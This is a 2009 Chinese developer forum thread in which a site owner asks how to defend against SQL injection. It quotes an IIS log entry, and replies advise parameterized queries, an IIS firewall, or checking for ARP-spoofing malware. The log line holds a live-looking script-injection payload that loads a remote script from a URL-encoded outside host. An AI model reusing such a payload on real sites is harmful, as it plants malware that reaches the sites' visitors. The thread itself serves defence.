首页 新闻 会员 周边 捐助

求sql注入防御方案,附IIS日志记录

0
悬赏园豆:5 [已解决问题] 解决于 2009-02-25 11:10

最近数据库屡屡给注入。查看IIS日志,发现下面可疑记录:

2009-01-18 11:53:04 W3SVC996384972 192.168.0.1 GET /NewsShow.aspx PostID=133"></title><script%20src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr 80 - 202.160.180.94 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 200 0 0

 /NewsShow.aspx 此页面为文章的内容显示页面,由于我已经将此表设置为只读,所以未能注入。可是不理解的是用户成员表给注入了。不知道是怎么样注入进来的。

求解解决的办法,如何针对此类SQL注入进行防御,最好能给出示例代码。谢谢了。

yangjun的主页 yangjun | 初学一级 | 园豆:17
提问于:2009-01-21 23:36
< >
分享
最佳答案
0

please use ADO.NET sql parameter to access database by .aspx webpage, sql injection could be happened during browser URL QueryString or ASPX TextBox control.

WizardWu

WizardWu | 小虾三级 |园豆:1402 | 2009-01-22 08:42
其他回答(4)
0

NewsShow.aspx  你的这个页面好像有可以插入的地方。你去看看网站有一些可疑文件。或者用好的杀毒软件看看。特别是不属于你网站原有的文件。 好像有什么恶意脚本加到了title中。

二十二号同学 | 园豆:790 (小虾三级) | 2009-01-22 00:18
0

不要才程序中拼sql,就如楼上说的采用参数化的方式执行sql才能从根本上解决sql注入的问题

TomYu | 园豆:240 (菜鸟二级) | 2009-01-22 10:08
0

如果自己能管理服务器的话,找个iis防火墙,可以预防sql注入,且都有注入记录!比如龙盾iis防火墙!这样省去写代码过滤

glxcs | 园豆:160 (初学一级) | 2009-01-23 02:02
0

这个问题应该不是SQL注入吧,是你的网站所在的网关被攻陷了,结果你的网站被Arp挂马了。我以前就碰到过一次类似的问题。

John Liu | 园豆:238 (菜鸟二级) | 2009-02-05 23:09
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册